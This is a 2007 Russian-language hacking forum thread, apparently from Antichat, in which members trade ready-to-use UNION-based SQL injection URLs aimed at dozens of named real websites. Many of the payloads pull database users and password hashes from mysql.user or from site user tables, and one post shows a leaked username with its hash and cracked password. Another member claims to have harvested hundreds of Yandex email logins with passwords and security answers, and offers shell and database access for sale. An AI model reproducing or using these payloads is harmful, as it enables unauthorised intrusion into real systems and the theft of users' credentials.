SQL Инъекции

c411k · 1 Apr 2007

n1†R0x said:
Code:
http://www.foodforfun.ru/self.php?id=-1+union+select+1,2,3/*
ы.. пусто.
Click to expand...
мдя, почему 1,2,3? )
http://www.foodforfun.ru/self.php?id=122+union+select+version(),2
Code:
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
выводка в title

мб кто дальше додумает
Click to expand...
mr. nitrox, вы лентяй, там нечего думать ) внизу же написано что xoops.. da i newbb стоит..

http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+xoops_users+where+uid=1/*
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+xoops_users+where+uid=4/*
piggy{AZ}:edc52ca4fc24580fec8c11d6b7c5859e
piggy{AZ}:celebes

короч, чистый мд5 там.

valiko · 1 Apr 2007

Code:

http://www.fish.bc.ca/news.php?news_id=-78+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*

InferNo23 · 1 Apr 2007

Code:

http://www.style2ouf.com/us/News/affiche_news.php?id_news=-1+union+select+concat(user,char(58),password),2,3,4,5,6,7+from+mysql.user/*

Code:

http://www.tamizdat.org/article.php?id=99999+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10,11,12,13+from+mysql.user/*

XTErner · 1 Apr 2007

Code:

http://www.vtb.no/vis.php?id=-3217+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(password,0x3a,user),0x71),0x71),4,5,6,7,8,9,10,11+from+mysql.user+limit+5,1/*

Code:

http://www.rushprint.no/artikkel.php?id=-889+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14/*

Code:

http://www.trondelag-teater.no/forestilling.php?id=-842+union+select+1,version()/*

c411k · 1 Apr 2007

яндек с.ру

показываю только багу, кому интересно - добивайте дальше.
http://tv.yandex.ru/broadcast.xml?id=8043801-1 выдает тоже самое что и
http://tv.yandex.ru/broadcast.xml?id=8043800
описывать дальнейшие действия как использовать скулю не буду, но кто желает купить шелл - в приват. есть доступ к бд, в общем все блага. ДОРОГО!
кому интересно, выцепил из БД пару сотен мыльников с пассами вида pass:login:s_question:s_answer

http://c411k.jino-net.ru/upload/yand.php

Fr-Ron · 1 Apr 2007

Там стоит IPB, префикс таблиц ibf_ , но запрос с "from" не проходит =\

http://www.gta.com.ua/file_details.phtml?id=-204+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Click to expand...

С этим ХЗ как бороться...

http://www.mirposterov.ru/poster.asp?id=228'
http://www.mirposterov.ru/poster.asp?id=-228+order+by+1
Click to expand...

Grey · 1 Apr 2007

Code:

http://medichelp.ru/?category=394&page=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*

Code:

http://www.dengi-info.com/news/?nid=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char)/*

Code:

http://www.salespb.ru/rubr.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version())/*

InferNo23 · 1 Apr 2007

Code:

http://www.gamersinfo.net/content/news.php?id=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9+from+user+limit+0,1/*

Code:

http://www.rolemancer.ru/sections.php?op=listarticles&secid=-1+union+select+concat(pass,char(58),uname),2,3,4,5+from+users/*

Grey · 1 Apr 2007

Code:

http://www.shopwell.ru/catalogue/tualet-cabine/?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12,13,14,15/*

Code:

http://www.553333.ru/towar.phtml?id_towar=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

valiko · 1 Apr 2007

Code:

http://www.outside-music.ca/news.php?id=-38+union+select+1,2,3,4,user(),version(),7,database(),9,10,11,12,13/*

Constantine · 1 Apr 2007

Обещал Грею на 1 апреля выложить стилизованную скулю =)
Code:
http://yalma.raokriomrati.com/main.html?id=-1+объединение+выбор+конкат(версия(),двоеточие,пользователь()),конкат_вс(двоеточие,пользователь,пасс)+из+пользователей/*
Оригинал, кстати достаточно гладко
Code:
http://yalma.raokriomrati.com/main.html?id=-1+union+select+concat(version(),char(58),user()),concat_ws(char(58),user,pass)+from+users/*

Grey · 1 Apr 2007

Code:

http://www.filippok.ru/index.php?s=33&t=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11,12,13/*

Constantine · 1 Apr 2007

Code:

http://www.la-belle.nl/nieuws/main.html?id=-17+union+select+convert(version()+using+latin1)/*&pos=0

Fr-Ron · 1 Apr 2007

Магазин, таблицы не осилил =(

http://www.slk-digital.ru/gadgets/?t_id=11+UNION+SELECT+1,2,3,4,5,6,7,8,9/*
Click to expand...

random · 1 Apr 2007

Code:

http://fri.net.ua/loadpsb.php?id=-520+union+select+1,2,3,4,5,6,7,8,9/*

Code:

http://pravopys.vlada.kiev.ua/index.php?id=-12+union+select+version()/*

XTErner · 1 Apr 2007

Code:

http://www.parkmanmusik.se/shop.php?id=-1+union+select+1,version(),3,4/*

zl0ba · 1 Apr 2007

С е р в и с ы д л я В е б П р о ф е с с и о н а л о в

http://right-web.net/right-design/news.shtml?id=-58+union+select+1,version(),user(),database(),5,6,7/*
Click to expand...

zl0ba · 1 Apr 2007

Кто хочет учиться зарубежом?

http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,version(),3,4,5,6,7,8,9/*
Click to expand...

random · 1 Apr 2007

zl0ba said:

Кто хочет учиться зарубежом?
Click to expand...

В Киевском международном соц. институте хочу :

http://www.kiis.com.ua/index.php?id=2&sp=1+union+select+1,2,3,4,table_name,6,7,8,9+from+information_schema.tables/*
http://www.kiis.com.ua/index.php?id=2&sp=1+union+select+1,2,3,4,column_name,6,7,8,9+from+information_schema.columns/*
Click to expand...

XTErner · 2 Apr 2007

shops

Code:

http://www.theracersgroup.com/shop/car.php?id=-19%20UNION%20SELECT%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*

Code:

http://www.kuchikomi-kobe.com/shop.php?id=-8%20UNION%20SELECT%201,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*

мало того,что иероглифы какието,так еще и таблиц не подобрал=\

SQL Инъекции

c411k Members of Antichat

valiko Elder - Старейшина

InferNo23 Elder - Старейшина

XTErner Elder - Старейшина

c411k Members of Antichat

Fr-Ron Elder - Старейшина

Grey Banned

InferNo23 Elder - Старейшина

Grey Banned

valiko Elder - Старейшина

Constantine Elder - Старейшина

Grey Banned

Constantine Elder - Старейшина

Fr-Ron Elder - Старейшина

random Elder - Старейшина

XTErner Elder - Старейшина

zl0ba ПсихолоГ

zl0ba ПсихолоГ

random Elder - Старейшина

XTErner Elder - Старейшина

Useful Searches

SQL Инъекции

c411k Members of Antichat

valiko Elder - Старейшина

InferNo23 Elder - Старейшина

XTErner Elder - Старейшина

c411k Members of Antichat

Fr-Ron Elder - Старейшина

Grey Banned

InferNo23 Elder - Старейшина

Grey Banned

valiko Elder - Старейшина

Constantine Elder - Старейшина

Grey Banned

Constantine Elder - Старейшина

Fr-Ron Elder - Старейшина

random Elder - Старейшина

XTErner Elder - Старейшина

zl0ba ПсихолоГ

zl0ba ПсихолоГ

random Elder - Старейшина

XTErner Elder - Старейшина